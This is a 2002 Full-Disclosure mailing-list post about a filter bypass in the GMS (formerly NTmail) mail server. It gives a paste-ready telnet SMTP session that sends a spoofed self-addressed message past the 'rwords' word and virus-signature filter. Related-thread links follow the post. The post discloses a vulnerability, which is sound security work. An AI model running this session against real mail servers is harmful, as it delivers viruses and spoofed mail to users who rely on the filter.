[Full-Disclosure] Another NTmail exploit

From: Geoincidents (geoincidents@getinfo.org)
Date: 11/23/02

From: geoincidents@getinfo.org (Geoincidents)
Date: Sat, 23 Nov 2002 11:16:39 -0500

GMS (what used to be called NTmail) has a filtering feature called "rwords"
that allows you to block incoming email based on word or phrase. If you add
a phrase to the rwords list then no email with that phrase should be
delivered to your users. Likewise if you add a virus signature this feature
can be used to block email virus.

>From anywhere in the world try the following (replace rwords and the
addresses then cut and paste this into a command prompt if you like):

telnet mail.targetmailserver.com 25
helo bob
mail from:targetuser@targetmailserver.com
rcpt to:targetuser@targetmailserver.com
Subject:delivery test

this is a test
rwords go here

Now go check that mailbox, rwords filtered email should not have been
delivered to it but there it is.. complete with virus or whatever else you
were trying to filter. This makes it trivial for anyone to bypass rwords
type filters. If your boss tells you to filter out emails requesting a r e
s u m e from employees then I could easily send your boss an email
requesting his.


Relevant Pages

  • Re: Message rules and spam
    ... > many variations of that phrase, ie, double m's in pharmacy, double c's etc. ... More recently, the Mozilla mail clients (Mozilla browser suite, Netscape ... here are two very good Naive Bayesian filter proxies: ...
  • Re: Search function
    ... "show" text box where a word or phrase would ... Is that a valid filter expression? ... "Bill" wrote: ... Let's say we have a form for entering and editing Employee information. ...
  • Re: Revised spam fillter for Outlook Express
    ... Question for Bob: ... Do you have to type just one word to filter ... The box prefaced by the numeral '3' is where you type in a phrase or word. ... will spammers read this post and modify their ...
  • Re: Internet Adult (illegal) Content Filtering - request for opinion
    ... stay away from closed source security products if you can. ... It does not purely filter ... Uses an advanced phrase weighting system to reduce over or under blocking. ... URL filtering is compatible with squidGuard black lists. ...